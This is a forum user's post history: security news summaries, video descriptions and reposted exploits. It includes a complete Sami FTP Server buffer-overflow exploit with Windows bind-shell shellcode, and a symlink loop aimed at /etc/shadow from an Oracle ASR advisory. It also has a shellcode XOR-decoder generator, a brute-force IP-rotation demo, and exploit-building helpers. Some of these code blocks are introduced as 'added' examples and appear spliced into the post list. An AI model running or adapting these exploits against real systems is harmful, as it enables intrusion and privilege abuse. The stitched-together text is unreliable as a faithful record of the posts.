Everything posted by Kwelwild
-
Description: In this video we continue explaining the Cross-Site Request Forgery attack. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: https://vimeo.com/60928774 Source: Web Apps Security Series Part 4 - Csrf
-
The founder of Megaupload is ever closer to extradition to the United States. Kim Dotcom, who has taken refuge in New Zealand, is trying to escape the Americans' piracy charges, piracy he is accused of committing through the file-sharing site Megaupload. American prosecutors have won an important victory in their effort to obtain the extradition of Kim Dotcom, the German who allegedly caused huge losses to the US entertainment industry through the Megaupload site. Alongside him, the Americans want to try Finn Batato, Mathias Ortmann and Bram van der Kolk, all of whom held senior positions in the company that ran the site, which was shut down in 2012. Paul Davison, one of Dotcom's lawyers, plans to challenge before the Supreme Court of New Zealand the ruling under which the defendants could end up extradited to the United States. The final extradition ruling has already been moved from March to August and could be pushed towards the end of the year if the Supreme Court agrees to hear the appeal. Kim Dotcom was arrested last year but released on bail. In January, a year after his arrest, the businessman launched a new site, Mega, a site for storing data, data which is visible only to the person who uploads it and to the person it is intended for. Source: Fondatorul Megaupload este tot mai aproape de extradarea in Statele Unite - www.yoda.ro
-
http://www.youtube.com/watch?v=M7Vf4Uv7ERc
-
Description: All ethical hackers know the "blocked IP" problem: when we try to brute-force a site and the site blocks our IP address... So I thought of a solution for this problem and I made this video about it. After my old video - Multi IP Threaded Tor BruteForce - POC 1 (Multi Ip Threaded Tor Bruteforce - Poc): I thought I could show more... Changing many IP addresses is good for a start, but you can't go to the grocery with it.... So I went to my computer and started programming (again)... And that's what I have done. About the login web page: this web page is programmed in PHP... After 5 bad tries the web application inserts the IP address into the database, so no more tries for you (before this script, of course). I used prepared statements for the username and password so it's secured from SQLi... As a respectable man told me: "The biggest problem is thinking you're safe when you're not really." Tools used: HconSTF, my script, phpMyAdmin, Eclipse. Music: Skrillex - First Of The Year (Equinox). Special thanks to Servers.mn for hosting the web page. Source: Multi Ip Threaded Tor Bruteforce - Poc 2
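The point the video makes is that a lockout keyed on the source address is only as strong as the attacker's supply of addresses. The following is an added example, not code from the video or its author: a small login guard whose lockout can be bound either to the source IP (as the PHP page in the video does) or to the account under attack, run against a constructed guess list and a pool of documentation-range addresses standing in for Tor exits. The password, guesses, threshold of five failures and pool addresses are all constructed for the demonstration.

```python
from collections import defaultdict

MAX_FAILURES = 5          # the video's web page: five bad tries and the IP is blocked
BLOCKED = "blocked"
FAILED = "failed"
OK = "ok"

# Constructed sample: one account, a short guess list ending in the real password, and a
# pool of addresses the attacker can hop between (documentation range, not real Tor exits).
PASSWORD = "s3cret!"
GUESSES = ["123456", "password", "letmein", "qwerty", "admin", "s3cret!"]
EXIT_POOL = ["203.0.113.%d" % i for i in range(1, 20)]


class LoginGuard:
    """Counts failures per key and refuses logins once a key has MAX_FAILURES failures.

    key_of(ip, user) decides what the lockout is bound to: the source IP (what the
    PHP page in the video does) or the account being attacked.
    """

    def __init__(self, key_of):
        self.key_of = key_of
        self.failures = defaultdict(int)

    def attempt(self, ip, user, password):
        key = self.key_of(ip, user)
        if self.failures[key] >= MAX_FAILURES:
            return BLOCKED                   # refused before the password is even checked
        if password == PASSWORD:
            return OK
        self.failures[key] += 1
        return FAILED


def by_ip(ip, user):
    return ip


def by_account(ip, user):
    return user


def brute_force(guard, rotate_every=4):
    """Try every guess in order, moving to a fresh exit address every `rotate_every`
    attempts, which is what the threaded Tor script does once an address is blocked.
    Returns the list of outcomes; the last one tells whether the attack got through."""
    results = []
    for n, guess in enumerate(GUESSES):
        ip = EXIT_POOL[n // rotate_every]
        results.append(guard.attempt(ip, "victim", guess))
    return results
```

With a single address the per-IP guard blocks the sixth attempt; rotating every four attempts keeps every address under the threshold and the correct password is accepted. Keying the lockout on the account stops the rotation trick, at the cost that an attacker can now lock a victim out on purpose, which is why production systems usually pair per-account throttling with progressive delays rather than a hard block.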
-
Windows Gather Screen Spy Module in Metasploit http://www.youtube.com/watch?feature=player_embedded&v=0WeTUBS0yQI#! Description: This module will incrementally take desktop screenshots from the host. This allows for screen spying, which can be useful to determine whether there is an active user on a machine, or to record the screen for later data extraction. NOTES: set VIEW_CMD to control how screenshots are opened/displayed; the file name will be appended directly onto the end of the value of VIEW_CMD. Original Source: https://www.youtube.com/watch?v=0WeTUBS0yQI Source: Windows Gather Screen Spy Module In Metasploit
-
Tagged with: backtrack 5, metasploit (and 2 more)
-
1. Maybe the attacks coming from Romania against foreign countries stood out too much, so they decided to burn us. My question is: burn us with what?! The government and its sites made in Word...
-
MiniDuke, the malware that hit European governments, can be removed from computers with a Romanian tool. An early version of the sophisticated malware has been active since May 2012, according to Bitdefender. The Romanians at Bitdefender are making a free tool available to everyone that removes MiniDuke, the dangerous malware that attacked the governments of several European states, from computers. MiniDuke was detected by Bitdefender Labs almost a year ago, and that version of the malware was added to the virus database on 26 May 2012, although at the time the malware was not known for its effects. The initial variant of MiniDuke differs from the one discovered now, first of all in that it uses a different installation method. In addition, it accesses the web page time-server.org to find out the current date in China. Otherwise, the behaviour of this first version of the malware is similar to the one announced recently. "The MiniDuke malware can cause major damage or collect huge amounts of information over the course of 10 months. The discovery of an early version of this virus, in May 2012, suggests that we are still at the beginning of understanding the size and scope of MiniDuke. We are continuing to analyse the software and will make other important details public as they are discovered," said Catalin Cosoi, Chief Security Strategist, Bitdefender. The analyses carried out so far show that MiniDuke extracts information from the IT systems of the governments of Ireland, Belgium, Romania, Portugal and the Czech Republic, as well as from other institutions, such as a healthcare provider in the United States of America or organisations in Japan, Brazil etc. The Bitdefender antivirus removes all known variants of MiniDuke. The company has also announced the availability of a free disinfection utility for this virus. For a more detailed analysis of the initial version of MiniDuke, see the technical report on the Bitdefender Labs blog. Source: MiniDuke, softul periculos care a afectat guvernele europene, poate fi eliminat din calculatoare cu o unealta romaneasca - www.yoda.ro
-
Unprecedented cyber attack on Romania. Specialists are trying to stop the data leak. Most likely, a foreign intelligence service sent viruses to government servers in an attempt to obtain secret data. The operation is ongoing, and the Romanian Intelligence Service warns that national security is in danger. Specialists are working right now, trying to stop the attack, according to StirilePROTV. One of the government servers was defeated by the virus, which managed to slip inside. From there, it began transmitting sensitive information to those who sent it. This is not a movie script but what is happening right now. The alert was triggered two days ago, when the virus was discovered hidden in certain servers in Romania. Most likely a foreign secret service is attacking Romania at the cyber level. Not our home computers, but those of the state institutions where confidential or even secret information is stored. The Romanian Intelligence Service confirmed the attack but would not specify which ministry, agency or secret service is its target. The technique has been used successfully for a year by hackers who want to steal passwords or information from anywhere in the world. An apparently harmless email is sent to a person working in the government sector, for example a greeting card. When they open it, a virus installs itself unnoticed on the computer. From there, it begins transmitting files, emails and passwords to whoever planted it there. This is the second cyber attack considered extremely dangerous for Romania's national security. Last year, the special services faced a group bearing the fingerprint of hackers from Russia called Red October, which targeted state institutions in our country. That attack was stopped. Now, the authorities are striving to limit the damage and stop the flow of sensitive information from government servers to what appears to be a foreign espionage service. Source: Atac cibernetic fara precedent asupra Romaniei. Specialistii incearca sa opreasca scurgerea de date - www.yoda.ro
-
Polonic Polonic... I knew it was you (you had the signature): On behalf DIICOT, SRI and FBI, amen! But it seems you deleted it. That rootkit, you can't get rid of it anymore, it's something like Polonic on RST.
-
[Hack Of The Day Part 6] Writing A Shellcode Decoder In Python Description: In this video, we pick up where we left off in the last video. The goal is to write a full-fledged decoder which can take any shellcode as input and output shellcode implementing the decoding scheme we outlined in the previous video. We modify decode.nasm to understand the essential parts of the decoder, specifically the ones which depend on the input shellcode. We then create a template from which we can easily write the decoder shellcode using a Python script. Enjoy, and please do leave your comments! Source: [Hack Of The Day Part 6] Writing A Shellcode Decoder In Python
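The description above explains the idea (a NASM decoder stub whose length, key and payload bytes are filled in by a Python script) but the decoding scheme and decode.nasm from the earlier video are not on this page. The following is an added example, not the video's script: it assumes a single-byte XOR scheme and a jmp/call/pop stub of the kind used in the series, picks a key so that no encoded byte is a bad byte, and renders the complete decoder source. The sample input is the well-known 23-byte Linux x86 execve("/bin//sh") shellcode, used here only as data; nothing in the script executes it.

```python
import random

# Sample input (constructed): the classic 23-byte Linux x86 execve("/bin//sh") shellcode.
# It is only data here; nothing in this script executes it.
SAMPLE_SHELLCODE = bytes([
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69,
    0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80,
])

# Assumption: single-byte XOR; the video's own scheme is not described on this page.
BAD_BYTES = {0x00}

# Decoder stub in the jmp/call/pop style; the three placeholders depend on the input.
TEMPLATE = """global _start
section .text
_start:
    jmp short call_decoder
decoder:
    pop esi                 ; esi -> first encoded byte
    xor ecx, ecx
    mov cl, {length}        ; bytes to decode (must fit in cl: <= 255)
decode:
    xor byte [esi], {key:#04x}
    inc esi
    loop decode
    jmp short encoded       ; fall into the now-decoded payload
call_decoder:
    call decoder            ; pushes the address of 'encoded' for the pop above
encoded: db {payload}
"""


def pick_key(shellcode, bad=BAD_BYTES, rng=random):
    """Choose a key such that neither the key nor any encoded byte is a bad byte.
    Keys are tried in random order; raises if no single-byte key works for this input."""
    keys = list(range(1, 256))
    rng.shuffle(keys)
    for key in keys:
        if key not in bad and all((b ^ key) not in bad for b in shellcode):
            return key
    raise ValueError("no single-byte XOR key avoids the bad bytes")


def xor_encode(shellcode, key):
    """XOR is its own inverse, so this both encodes and (on the encoded bytes) decodes."""
    return bytes(b ^ key for b in shellcode)


def render_decoder(shellcode, key=None):
    """Return (nasm_source, key, encoded_bytes) for the given shellcode."""
    if len(shellcode) > 255:
        raise ValueError("the stub loads the length with 'mov cl', payload must be <= 255 bytes")
    if key is None:
        key = pick_key(shellcode)
    encoded = xor_encode(shellcode, key)
    payload = ",".join("0x%02x" % b for b in encoded)
    return TEMPLATE.format(length=len(shellcode), key=key, payload=payload), key, encoded


if __name__ == "__main__":
    source, key, _ = render_decoder(SAMPLE_SHELLCODE)
    print("; key = %#04x" % key)
    print(source)
```

The rendered source assembles with `nasm -f elf32` and links with `ld -m elf_i386`; after assembling, check the whole stub (not just the payload) for bad bytes, since the template's own instruction encodings are fixed and `mov cl, 0` would reintroduce a NUL for an empty payload.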
-
The social network invites journalists to check out the feed's "new look" at its headquarters on Thursday. (Credit: Facebook) Get ready for some changes to your Facebook profile. The social network is unveiling a new design for its News Feed on Thursday, according to an invite sent to journalists today. The bare-bones invite tells journalists to "Come see a new look for News Feed," at Facebook's Menlo Park, Calif., headquarters next week. Coincidentally, a new look for Timeline was spotted today in New Zealand, a country where Facebook typically tries out new features. The layout had a single- Source: Facebook to unveil new News Feed design next week | Internet & Media - CNET News
-
The American company is being asked to explain why it has not changed its terms regarding users' confidential data even though it was asked to do so back in October of last year. Google is in trouble in Europe again, trouble related to the way it collects data on those who use its services. The American company changed its terms regarding confidential data back in March of last year, and the first country to take a stand was France. "In the recommendation of October 2012, we asked that the American company's terms be modified for better protection of customer data. We note that to this day Google has not taken measures to comply with the requirements of Directive 95/46/EC," states the complaint signed by 30 European officials. The Americans changed their privacy policy in order to "bring together" (as they put it) user data from over 60 products, among them YouTube and GoogleMail. The company has not responded to the complaint filed by the European officials. Source: Google va fi chemat in justitie pentru strangerea excesiva de date de la utilizatori - www.yoda.ro
-
Though Google is a U.S. company, its American rights don't transpose across the pond. A court case will determine whether Google has to comply with EU law, which could have far-reaching consequences for European users. Google's New York City headquarters. (Credit: Zack Whittaker/CNET) How Google and other American Internet companies operate in Europe could come down to a link that, depending on what side of the Atlantic Ocean you're on, should or should not be deleted. A case heard Tuesday before the European Court of Justice (ECJ) hinges on a complaint submitted by a Spanish citizen who searched Google for his name and found a news article from several years earlier, saying his property would be auctioned because of failed payments to his social security contributions. Spanish authorities argued that Google, other search engines, and other Web companies operating in Spain should remove information such as that if it is believed to be a breach of an individual's privacy. Google, however, believes that it should not have to delete search results from its index because the company didn't create it in the first place. Google argued that it is the publisher's responsibility and that its search engine is merely a channel for others' content. The ECJ's advocate-general will publish its opinion on the case on June 25, with a judgment expected by the end of the year. The outcome of the hearing will affect not only Spain but also all of the 27 member states of the European Union. In principle, this fight is about freedom of speech versus privacy, with a hearty dash of allegations of censorship mixed in. In reality, this could be one of the greatest changes to EU privacy rules in decades -- by either strengthening the rules or negating them altogether. The European view is simple: If you're at our party, you have to play by our rules. And in Europe, the "right to be forgotten" is an important one. 
"Facebook and Google argue they are not subject to EU law as they are physically established outside the EU," a European Commission spokesperson told CNET. In new draft privacy law proposals, the message is, "as long as a company offers its goods or services to consumers on the EU territory, EU law must apply." While Europe has some of the strongest data protection and privacy laws in the world, the U.S. doesn't. And while the U.S. has some of the strongest free speech and expression laws in the world, enshrined by a codified constitution, most European countries do not, instead favoring "fair speech" principles. Google is also facing another legal twist: Spanish authorities are treating it like a media organization without offering it the full legal protection of one. Newspapers should be exempt from individual takedown requests to preserve freedom of speech, according to Spanish authorities, but Google should not enjoy the same liberties, despite having no editorial control and despite search results being determined by algorithms. Though Google is branded a "publisher" like newspapers, the search giant does not hold media-like protection from takedowns under the country's libel laws. This does not translate across all of Europe, however. Some European member states target newspapers directly and hold them accountable through press regulatory authorities in a bid to balance freedom of speech and libel laws. Spain's data protection authority, the Agencia Española de Protección de Datos (AEPD), found in favor of the complainant in early 2011 and ruled that Google should delete the search result. This case is one of around 180 other ongoing cases in the country.
Google appealed the decision and the case was referred to the highest court in Europe, the ECJ, which will eventually determine whether the search giant is the "controller" of the data or whether it is merely a host of the data. The case will also decide whether U.S.-based companies are subject to EU privacy law, which may mean EU citizens have to take their privacy cases to U.S. courts to determine whether Google is responsible for the damage caused by the "diffusion of personal information." In a blog post on Tuesday, Bill Echikson, Google's "head of free expression," said the search giant "declined to comply" with a request by Spanish data protection authorities, as the search listing "includes factually correct information that is still publicly available on the newspaper's Web site." "There are clear societal reasons why this kind of information should be publicly available. People shouldn't be prevented from learning that a politician was convicted of taking a bribe, or that a doctor was convicted of malpractice," Echikson noted. "We believe the answer to that question is 'no'. Search engines point to information that is published online - and in this case to information that had to be made public, by law. In our view, only the original publisher can take the decision to remove such content. Once removed from the source webpage, content will disappear from a search engine's index." EU's latest privacy proposal: The 'right to be forgotten' Should the ECJ find in favor of the Spanish complainant, it will be the biggest shakeup to EU privacy rules in close to two decades and would give European citizens a "right to be forgotten." In January 2012, the European Commission lifted the lid on draft proposals for a single one-size-fits-all privacy regulation for its 27 member states.
One of the proposals was the "right to be forgotten," giving every European resident the right to force Web companies as well as offline firms to delete or remove their data to preserve their privacy. For Europeans, privacy is a fundamental right of all residents, according to Article 8 of the European Convention on Human Rights, which states: "Everyone has the right to respect for his private and family life, his home and his correspondence." It does however add a crucial exception. "There shall be no interference by a public authority with the exercise of this right except... for the protection of the rights and freedoms of others." The European Parliament in Strasbourg, France, where the new data and privacy law will be voted on later this year. A vote by the Parliament's Civil Liberties (LIBE) committee in June will determine whether the Commission can push the draft proposals into law. (Credit: European Parliament/Flickr) Because U.S.-based technology giants like Google, Facebook, and Twitter have users and in many cases a physical presence in Europe, they must comply with local laws. The "right to be forgotten" would force Facebook and Twitter to remove any data they had on you, as well as Google removing results from its search engine. It would also extraterritorially affect users worldwide outside the European Union, who would also be unable to search for those removed search terms. Such Web companies have said (and lobbied to that effect) that the "right to be forgotten" should not allow data to be removed or manipulated at the expense of freedom of speech. This, however, does not stop with republished material and other indexed content, and most certainly does not apply to European law enforcement and intelligence agencies. Two continents, separated by 'free' and 'fair speech' The U.S. and the EU have never seen eye-to-eye on data protection and privacy.
For Americans and U.S.-based companies, the belief is that crossover between freedom of speech and privacy overlaps in "a form of censorship," according to Google's lawyers speaking during the Spanish court case. In the U.S., you can freely say the most appalling words, so long as they don't lead to a crime or violence against a person or a group of people. In European countries such as the U.K. words can lead to instant arrest. Europe's laws allow for "fair speech" in order to prevent harassment, fear of violence, or even alarm and distress. It's a dance between the American tradition of protecting the individual and the European tradition of protecting society. Google is fundamentally so very American in this regard. That said, Google already filters and censors its own search results at the behest of governments and private industry, albeit openly and transparently. Google will agree to delete links that violate copyrights under the Digital Millennium Copyright Act, which seeks to remove content from Google's search results that may facilitate copyright infringement. Google also complies, when forced by a court, with numerous types of government requests, not limited to subpoenas, search warrants, and National Security Letters, or so-called 'gagging orders'. It also discloses those requests and when it complies with them. And it's a system not that dissimilar to what it's being asked to do in Europe. Whose jurisdiction is Google under: U.S., EU, or both? While Europe's privacy principles apply to the Web, it's unclear whether they apply to data "controllers" established outside of the European Union. But several European court cases have sided with local law. A German court found that Facebook fell under Irish law because the social networking company had a physical presence in Ireland, another EU member state. 
In Google's case, Spanish authorities are making a similar argument, claiming that Google is processing data in a European state and therefore EU law should apply. Many American companies have voiced their objections to the proposed EU privacy law, including Amazon, eBay and Yahoo, according to a lobbying watchdog. It could still take a year or two for the law to be ratified. "Exempting non-EU companies from our data protection regulation is not on the table. It would mean applying double standards," said Europe's Justice Commissioner Viviane Reding, the top politician in Europe on data protection and privacy rules in the region, in an interview with the Financial Times of London. The new EU Data Protection Regulation, proposed by the European Commission and currently being debated in the European Parliament, will likely be voted on by June. But this fight isn't as much about censorship as one might think. It's about a cultural difference between two continents and perspectives on what freedom of speech can and should be. It's also about privacy, and whether privacy or free speech is more important. Source: Google's European conundrum: When does privacy mean censorship? | Security & Privacy - CNET News
-
Sami FTP Server 2.0.1 LIST Command Buffer Overflow

#!/usr/bin/env python
# Exploit Title: Sami FTP LIST buffer overflow
# Date: 27 Feb 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.karjasoft.com/old.php
# Version: Sami FTP Server 2.0.1
# Tested on: Windows XP Pro SP1, English
#            Windows XP Pro SP2, English
#
# Description:
# A buffer overflow is triggered when a long LIST command is sent to the
# server and the user views the Log tab.
#
from socket import *
import struct, sys

IP = sys.argv[1]

# Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/
# Remove bad chars using msfencode:
#   msfencode -b "\x00\x0a\x0d\x2f" -i w32-bind-ngs-shellcode.bin
#   [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)
shellcode = (
    "\xd9\xc7\xbe\x4d\xa5\xde\x30\xd9\x74\x24\xf4\x5f\x2b\xc9" +
    "\xb1\x36\x31\x77\x19\x03\x77\x19\x83\xc7\x04\xaf\x50\xef" +
    "\xf9\x4b\x10\x61\xca\x18\x50\x8e\xa1\x68\x81\x05\xdb\x9c" +
    "\x32\x67\x04\x17\x72\xa0\x0b\x3f\x0e\x23\xc2\x57\xc2\x9c" +
    "\xd6\x95\x4a\x45\x4f\xae\xf9\xe1\xd8\xdf\xf7\x69\xaf\x39" +
    "\xb2\x89\x99\x09\x94\x41\x50\x76\x31\xaa\xc9\x39\xef\x0c" +
    "\x5f\xee\x5e\x0c\xb0\x3c\xc5\x5d\xc4\x61\x39\xe9\x86\x84" +
    "\x39\xec\xdd\x3d\xf2\xce\x20\xa8\x53\x3e\xf1\x68\xd7\x74" +
    "\x64\x6d\x09\xc0\xb0\xc1\xe1\x58\x95\xdd\x36\xea\x90\x2a" +
    "\x7c\x2b\x2e\x3f\xdf\xb8\x9b\x9b\xe1\x57\x14\x54\xf5\xf6" +
    "\xa0\xd1\xea\xf9\x5f\x6c\xfa\xf9\x9b\xff\x50\x7d\x9d\xf6" +
    "\xd3\x76\x6f\x56\x18\xd4\x90\xb6\x77\x4f\xee\x08\x0b\x1a" +
    "\x5e\x2a\x46\x1b\x70\x7f\x67\x34\xe4\xfe\xb7\x4b\xf8\x8f" +
    "\xfb\xd9\x17\xd8\x56\x48\xe7\x36\x2d\xb3\x63\x4e\x1f\xe6" +
    "\xde\xc6\x03\x6b\xbb\x36\x49\x0f\x67\x0e\xfa\x5b\xcc\xa8" +
    "\xbb\x72\x12\x60\xc3\xb9\x31\xdf\x99\x93\x6b\x19\x5a\xfb" +
    "\x84\xf2\x37\x51\xc2\xae\x48\x03\x08\xc5\xf1\x50\x39\x13" +
    "\x02\x57\x45"
)

# EIP overwritten at offset 218
# JMP ESP at 10028283 C:\Program Files\PMSystem\Temp\tmp0.dll (Universal)
buf = "A" * 218 + struct.pack("<I", 0x10028283) + "\x90" * 37 + shellcode

s = socket(AF_INET, SOCK_STREAM)
s.connect((IP, 21))
print s.recv(1024)
s.send("USER superkojiman\r\n")
print s.recv(1024)
s.send("PASS letmein\r\n")
print s.recv(1024)
print "[+] sending payload of size", len(buf)
s.send("LIST " + buf + "\r\n")
print s.recv(1024)
s.close()
print "[+] sent. Connect to %s on port 28876" % (sys.argv[1],)

Source: Sami FTP Server 2.0.1 LIST Command Buffer Overflow
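The exploit states its two measured facts, the EIP offset of 218 and the bad-character list `\x00\x0a\x0d\x2f`, without showing how they are obtained or checked. The following is an added example, not part of superkojiman's exploit: a Metasploit-style cyclic pattern generator and offset finder of the kind used to measure that 218, a bad-character scan, and a buffer builder that reproduces the exploit's `padding | ret | nop sled | shellcode` layout and refuses a return address or payload containing a bad character. The 37-byte sled and the JMP ESP address are taken from the exploit; everything else is constructed.

```python
import string
import struct

BAD_CHARS = b"\x00\x0a\x0d\x2f"   # the exploit's msfencode -b list: NUL, LF, CR and '/'


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): within its 20280-byte cycle every
    3-byte window is unique, so the dword that lands in EIP identifies its own offset."""
    out = bytearray()
    for u in string.ascii_uppercase.encode():
        for l in string.ascii_lowercase.encode():
            for d in string.digits.encode():
                out += bytes([u, l, d])
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than the 20280-byte cycle")


def pattern_offset(eip_value, length):
    """eip_value is the crashed EIP as the debugger shows it (an integer such as 0x37634136).
    The bytes were read from memory little-endian, so pack them back before searching."""
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


def check_bad_chars(data, bad=BAD_CHARS):
    """Return (offset, byte) pairs that would truncate or corrupt the LIST argument."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_buffer(offset, ret, shellcode, nops=37):
    """Same layout as the exploit: padding | ret | nop sled | shellcode.
    The return address is checked for bad chars too; 0x10028283 happens to be clean."""
    ret_bytes = struct.pack("<I", ret)
    problems = check_bad_chars(ret_bytes) + check_bad_chars(shellcode)
    if problems:
        raise ValueError("bad chars at %r" % problems)
    return b"A" * offset + ret_bytes + b"\x90" * nops + shellcode


if __name__ == "__main__":
    # Send pattern_create(600) as the LIST argument, read EIP in the debugger, then:
    crash_eip = int.from_bytes(pattern_create(600)[218:222], "little")   # constructed crash value
    print("EIP 0x%08x -> offset %d" % (crash_eip, pattern_offset(crash_eip, 600)))
```

Fuzzing with the cyclic pattern instead of a run of "A"s is what turns "the server crashed" into "EIP is overwritten at 218"; the same pattern read at ESP tells how much room the sled and shellcode have after the return address.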
-
Oracle Auto Service Request insecurely creates files in /tmp using time stamps, allowing root-owned files to be clobbered.

Oracle Auto Service Request /tmp file clobbering vulnerability
http://www.oracle.com/us/support/systems/premier/auto-service-request-155415.html
http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm

I noticed it creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root-owned files if you know roughly when the root administrator will be using this utility.

[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done

root executes the asr command:

[root@oracle-os-lab01 bin]# ./asr register
OR
register [-e asr-manager-relay-url] : register ASR
unregister                          : unregister ASR
show_reg_status                     : show ASR registration status
test_connection                     : test connection to Oracle
. . .
version                             : show asr script version
exit
help                                : display a list of commands
?                                   : display a list of commands
asr>

/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722:

root # cat /etc/shadow
id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1 Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1 Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1 Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0 Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0 Master=72
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1

Problem code:

The asr binary is a wrapper for a Java class; the following snippet of code is where the error lies:

/sbin/sh:root@unix-solaris# grep -n tmp asr
409: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
410: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
411: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
557: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
681: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
691: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
706: file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'`
710: file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'`
797: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
987: hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'`
988: tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'`
989: tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'`
1303: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1334: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1343: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1344: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
1345: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
1405: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
2198: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`

This affects the software package on both Solaris and Linux. Vendor notified about a month ago.

@_larry0 Larry W. Cashdollar http://otiose.dhs.org/

Source: Oracle Auto Service Request File Clobber - Packet Storm
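The advisory shows the attack but not, side by side, why mkstemp() closes it. The following is an added example, not part of the advisory or of Oracle's script: it reproduces the race in a throwaway directory that stands in for /tmp, with a constructed file standing in for /etc/shadow. The insecure writer builds the same `status1_<%m%d%y%H%M%S>` name the asr script does and opens it with a plain open(), which follows a planted symlink; the fixed writer uses tempfile.mkstemp(), whose unpredictable name and O_CREAT|O_EXCL open cannot be redirected. POSIX symlink semantics (Linux or Solaris) are assumed.

```python
import os
import shutil
import tempfile
import time

ORIGINAL = "root:$6$original:15000:0:99999:7:::\n"   # constructed stand-in for /etc/shadow
STAMP_FMT = "%m%d%y%H%M%S"                            # the asr script's date format


def insecure_tmp_write(tmpdir, data, now):
    """What the asr script does: a predictable /tmp/status1_<timestamp> opened for writing.
    open(..., 'w') is O_CREAT|O_TRUNC without O_EXCL, so an existing symlink at that name
    is followed and the write lands on whatever the attacker pointed it at."""
    name = "status1_" + time.strftime(STAMP_FMT, time.localtime(now))
    path = os.path.join(tmpdir, name)
    with open(path, "w") as f:
        f.write(data)
    return path


def secure_tmp_write(tmpdir, data):
    """The fix: mkstemp() picks a random name and opens it O_CREAT|O_EXCL with mode 0600,
    so a pre-planted name is never reused and a symlink is never followed."""
    fd, path = tempfile.mkstemp(prefix="status1_", dir=tmpdir)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def plant_symlinks(tmpdir, target, around, window=30):
    """The attacker's loop: one link per second covering the minute root is expected to run."""
    for off in range(-window, window + 1):
        name = "status1_" + time.strftime(STAMP_FMT, time.localtime(around + off))
        link = os.path.join(tmpdir, name)
        if not os.path.lexists(link):
            os.symlink(target, link)


def excl_open_refuses(path):
    """O_EXCL on a name that already exists, even as a symlink, fails instead of following it."""
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        return True
    os.close(fd)
    return False


def run_demo():
    """Plant links, then run the safe writer and the asr-style writer; report what each did."""
    sandbox = tempfile.mkdtemp()                      # stands in for /tmp
    try:
        target = os.path.join(sandbox, "shadow")      # stands in for /etc/shadow
        with open(target, "w") as f:
            f.write(ORIGINAL)
        now = time.time()
        plant_symlinks(sandbox, target, now)

        safe_path = secure_tmp_write(sandbox, "registration ok\n")
        after_safe = open(target).read()
        planted = os.path.join(sandbox, "status1_" + time.strftime(STAMP_FMT, time.localtime(now + 3)))
        refused = excl_open_refuses(planted)

        insecure_tmp_write(sandbox, "id State Bundle\n", now + 3)   # root runs asr 3 s later
        after_insecure = open(target).read()
        return {
            "safe_kept_target": after_safe == ORIGINAL,
            "safe_path_is_regular": os.path.isfile(safe_path) and not os.path.islink(safe_path),
            "excl_refused_planted_name": refused,
            "target_after_insecure": after_insecure,
        }
    finally:
        shutil.rmtree(sandbox)


if __name__ == "__main__":
    for k, v in run_demo().items():
        print("%-28s %r" % (k, v))
```

In the shell script itself the equivalent one-line fix is `file1=$(mktemp /tmp/status1.XXXXXX) || exit 1`; the seconds-granularity `date` name also collides with itself when the script runs twice in one second, which is a reliability bug even without an attacker.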
-
Description: MASTIFF2HTML is a Python program used to create a GUI results interface in HTML from MASTIFF results. Download the Python program at: https://github.com/1aN0rmus/TekDefense/blob/master/MASTIFF2HTML.py MASTIFF is an automated static malware analysis framework. Learn more about MASTIFF at: http://www.tekdefense.com/news/2013/2/22/tektip-ep23-mastiff-with-a-splash-of-maltrieve.html Source: http://www.securitytube.net/video/7033
-
Description: This video demonstrates how to use Cuckoo Sandbox for malware analysis on BackTrack 5 R3. Source: Cuckoo Sandbox Demo
-
